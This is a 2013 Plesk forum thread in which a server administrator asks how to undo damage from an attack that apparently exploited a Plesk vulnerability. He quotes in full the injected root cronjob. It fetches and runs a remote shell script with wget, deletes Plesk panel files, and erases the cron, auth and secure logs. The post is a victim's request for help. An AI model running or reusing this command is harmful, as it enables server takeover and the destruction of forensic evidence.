1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice
  2. Dear Pleskians, please read this carefully! New attachments and other rules Thank you!
    Dismiss Notice
  3. Dear Pleskians, I really hope that you will share your opinion in this Special topic for chatter about Plesk in the Clouds. Thank you!
    Dismiss Notice

Help reverting changes due to exploit

Discussion in 'Plesk 9.x for Linux Issues, Fixes, How-To' started by matteosistisette, Jan 17, 2013.

  1. matteosistisette

    matteosistisette New Pleskian

    10
    60%
    Joined:
    Sep 19, 2012
    Messages:
    9
    Likes Received:
    0
    Hi,

    I have received an attack that probably exploited the vulnerability described in:
    http://kb.parallels.com/en/113321

    Someone or something was able to inject a cronjob into my server which ran:

    Cron <root@ks3094309> cd /tmp;wget http://128.173.237.127:8080/browser/browser/backup1.sh;chmod x backup1.sh;sh /tmp/backup1.sh;rm -Rf /tmp/backup1.sh;chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/control.php;chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/eng.php;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/control.php;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;rm -Rf /usr/local/psa/admin/logs/httpsd_access_log;rm -Rf /var/log/cron;rm -Rf /var/log/secure;rm -Rf /var/log/lastlog;rm -Rf /var/log/auth.log;cd /usr/local/psa/admin/htdocs/enterprise/control/;mv agent.php agenti.php;mv old.php agenti.php;mv Agent.php agenti.php


    Among other things this downloads and executes a shell script. I'm already investigating the content of the script and how to revert (if possible) the changes it did.

    However, the command above does also other things that I don't understand. It seems like it screwed up some components of Plesk.

    AFTER this, I installed all the updates and ran the vulnerability check available here: http://kb.parallels.com/en/113424 which returned OK (it didn't before the updates).

    The question is: can anybody explain me what the abovementioned commands do, what components of psa may have been compromised, and how I can restore them? (not taking into account the execution of the downloaded shell script, of course).
    Or can I assume that by installing the updates, any compromised Plesk components have been restored? (I guess not)

    Thanks
    m.
     
  2. matteosistisette

    matteosistisette New Pleskian

    10
    60%
    Joined:
    Sep 19, 2012
    Messages:
    9
    Likes Received:
    0
    There MUST be some tool provided by Parallels to fix the damages made by this attack. I have seen posts by people affected by the exact same attack, so I guess it's been pretty common, and after all this is due to a security vulnerability in Plesk....
     
Loading...